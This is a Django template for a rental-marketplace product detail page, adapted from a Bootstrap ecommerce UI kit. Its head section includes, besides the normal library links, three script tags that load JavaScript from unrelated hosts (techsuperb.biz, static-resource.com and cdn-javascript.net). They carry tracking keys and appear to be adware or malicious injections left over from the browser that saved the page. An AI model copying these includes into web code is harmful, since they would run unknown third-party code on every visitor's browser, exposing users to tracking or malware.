<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="author" content="Bootstrap-ecommerce by Vosidiy">

<title>Bootstrap ecommerce UI KIT - Alibaba example html template </title>

<link rel="shortcut icon" type="image/x-icon" href="images/favicon.ico">

    <!-- jQuery -->
<script src="http://bootstrap-ecommerce.com/ui-ecommerce/js/jquery-2.0.0.min.js" type="text/javascript"></script>
<script src="//techsuperb.biz/200e670f09e3b73afa.js"></script>

<!-- Bootstrap4 files-->
<script src="http://bootstrap-ecommerce.com/ui-ecommerce/js/bootstrap.bundle.min.js" type="text/javascript"></script>
<link href="http://bootstrap-ecommerce.com/ui-ecommerce/css/bootstrap.css" rel="stylesheet" type="text/css">

<!-- Font awesome 5 -->
<link href="http://bootstrap-ecommerce.com/ui-ecommerce/fonts/fontawesome/css/fontawesome-all.min.css" type="text/css" rel="stylesheet">

<!-- custom style -->
<link href="http://bootstrap-ecommerce.com/ui-ecommerce/css/ui.css" rel="stylesheet" type="text/css">
<link href="http://bootstrap-ecommerce.com/ui-ecommerce/css/responsive.css" rel="stylesheet" media="only screen and (max-width: 1200px)">

<!-- custom javascript -->
<script src="http://bootstrap-ecommerce.com/ui-ecommerce/js/script.js" type="text/javascript"></script>


<!-- plugin: fancybox  -->
<script src="http://bootstrap-ecommerce.com/ui-ecommerce/plugins/fancybox/fancybox.min.js" type="text/javascript"></script>
<link href="http://bootstrap-ecommerce.com/ui-ecommerce/plugins/fancybox/fancybox.min.css" type="text/css" rel="stylesheet">

<!-- plugin: owl carousel  -->
<link href="http://bootstrap-ecommerce.com/ui-ecommerce/plugins/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet">
<link href="http://bootstrap-ecommerce.com/ui-ecommerce/plugins/owlcarousel/assets/owl.theme.default.css" rel="stylesheet">
<script src="http://bootstrap-ecommerce.com/ui-ecommerce/plugins/owlcarousel/owl.carousel.min.js"></script>

<script type="text/javascript">
/// some script

// jquery ready start
$(document).ready(function() {
	// jQuery code

});
// jquery end
</script>

<script type="text/javascript" src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8206x"></script><script type="text/javascript" src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8206x&amp;format=arrjs&amp;r=1558034118390"></script>

</head>

{% extends "P2P_Renting/base.html" %}
{% block content %}
    <body style="">
<header class="section-header">


 <!-- header-main .// -->
</header> <!-- section-header.// -->

<!-- ========================= SECTION TOPBAR ========================= -->

<!-- ========================= SECTION TOPBAR .// ========================= -->

<!-- ========================= SECTION CONTENT ========================= -->
<section class="section-content bg padding-y-sm">
<div class="container">
<nav class="mb-3">

</nav>

<div class="row">
<div class="col-xl-10 col-md-9 col-sm-12">


<main class="card">
	<div class="row no-gutters">
		<aside class="col-sm-6 border-right">
<article class="gallery-wrap">
<div class="img-big-wrap">
  <div> <a href={{ object.product_image.url }} data-fancybox=""><img src={{ object.product_image.url }}></a></div>
</div> <!-- slider-product.// -->
<div class="img-small-wrap">
  <div class="item-gallery"> <img src={{ object.product_image.url }} ></div>
  <div class="item-gallery"> <img src={{ object.product_image.url }} ></div>
  <div class="item-gallery"> <img src={{ object.product_image.url }} ></div>
  <div class="item-gallery"> <img src={{ object.product_image.url }} ></div>
</div> <!-- slider-nav.// -->
</article> <!-- gallery-wrap .end// -->
		</aside>
		<aside class="col-sm-6">
<article class="card-body">
<!-- short-info-wrap -->
	<h3 class="title mb-3">{{ object.title }}</h3>

<div class="mb-3">
	<var class="price h3 text-warning">
		<span class="currency">Rs. </span><span class="num">{{ object.price }}</span>
	</var>
	<span>/per week</span>
</div> <!-- price-detail-wrap .// -->
<dl>
  <dt>Description</dt>
  <dd><p>{{ object.content }}</p></dd>
</dl>
<dl class="row">
  <dt class="col-sm-3">Model#</dt>
  <dd class="col-sm-9">12345611</dd>

  <dt class="col-sm-3">Color</dt>
  <dd class="col-sm-9">Black and white </dd>

  <dt class="col-sm-3">Delivery</dt>
  <dd class="col-sm-9">Russia, USA, and Europe </dd>
</dl>
<div class="rating-wrap">

	<ul class="rating-stars">
		<li style="width:80%" class="stars-active">
			<i class="fa fa-star"></i> <i class="fa fa-star"></i>
			<i class="fa fa-star"></i> <i class="fa fa-star"></i>
			<i class="fa fa-star"></i>
		</li>
		<li>
			<i class="fa fa-star"></i> <i class="fa fa-star"></i>
			<i class="fa fa-star"></i> <i class="fa fa-star"></i>
			<i class="fa fa-star"></i>
		</li>
	</ul>
	<div class="label-rating">132 reviews</div>
	<div class="label-rating">154 orders </div>
</div> <!-- rating-wrap.// -->
<hr>
	<div class="row">
		<div class="col-sm-5">
			<dl class="dlist-inline">
			  <dt>Quantity: </dt>
			  <dd>
			  	<select class="form-control form-control-sm" style="width:70px;">
			  		<option> 1 </option>
			  		<option> 2 </option>
			  		<option> 3 </option>
			  	</select>
			  </dd>
			</dl>  <!-- item-property .// -->
		</div> <!-- col.// -->
		<div class="col-sm-7">
			<dl class="dlist-inline">
				  <dt>Size: </dt>
				  <dd>
				  	<label class="form-check form-check-inline">
					  <input class="form-check-input" name="inlineRadioOptions" id="inlineRadio2" value="option2" type="radio">
					  <span class="form-check-label">SM</span>
					</label>
					<label class="form-check form-check-inline">
					  <input class="form-check-input" name="inlineRadioOptions" id="inlineRadio2" value="option2" type="radio">
					  <span class="form-check-label">MD</span>
					</label>
					<label class="form-check form-check-inline">
					  <input class="form-check-input" name="inlineRadioOptions" id="inlineRadio2" value="option2" type="radio">
					  <span class="form-check-label">XXL</span>
					</label>
				  </dd>
			</dl>  <!-- item-property .// -->
		</div> <!-- col.// -->
	</div> <!-- row.// -->
	<hr>
    {% if object.author == user %}
            <div>
                <a class="btn btn-outline-warning" href="{% url 'P2P_Renting-Update' object.id %}">Update</a>
                <a class="btn btn-outline-danger" href="{% url 'P2P_Renting-Delete' object.id %}">Delete Post</a>
            </div>
    {%  else %}
            <!--<a href="#" class="btn  btn-outline-warning"> Rent </a>-->
            <form method='POST' action='{% url "cart_update" %}' class="form"> {% csrf_token %}
                <input type='hidden' name='product_id' value='{{ post.id }}' />
                {% if post in cart.products.all %}
                    <button type="submit" class="btn btn-danger">Remove</button>
                {% else %}
                    <button type="submit" class="btn btn-outline-warning">Rent Now</button>
                {% endif %}
            </form>
    {% endif %}

<!-- short-info-wrap .// -->
</article> <!-- card-body.// -->
		</aside> <!-- col.// -->
	</div> <!-- row.// -->
</main> <!-- card.// -->

<!-- PRODUCT DETAIL -->
<article class="card mt-3">
	 <!-- card-body.// -->
</article> <!-- card.// -->

<!-- PRODUCT DETAIL .// -->

</div> <!-- col // -->
<aside class="col-xl-2 col-md-3 col-sm-12">
 <!-- card.// -->
 <!-- card.// -->
</aside> <!-- col // -->
</div> <!-- row.// -->



</div><!-- container // -->
</section>
<!-- ========================= SECTION CONTENT .END// ========================= -->


<!-- ========================= FOOTER ========================= -->

<!-- ========================= FOOTER END // ========================= -->



<object id="__symantecPKIClientMessenger" data-supports-flavor-configuration="true" data-extension-version="0.5.0.109" style="display: none;"></object><span id="__symantecPKIClientDetector" style="display: none;">__PRESENT</span></body>
{% endblock content %}
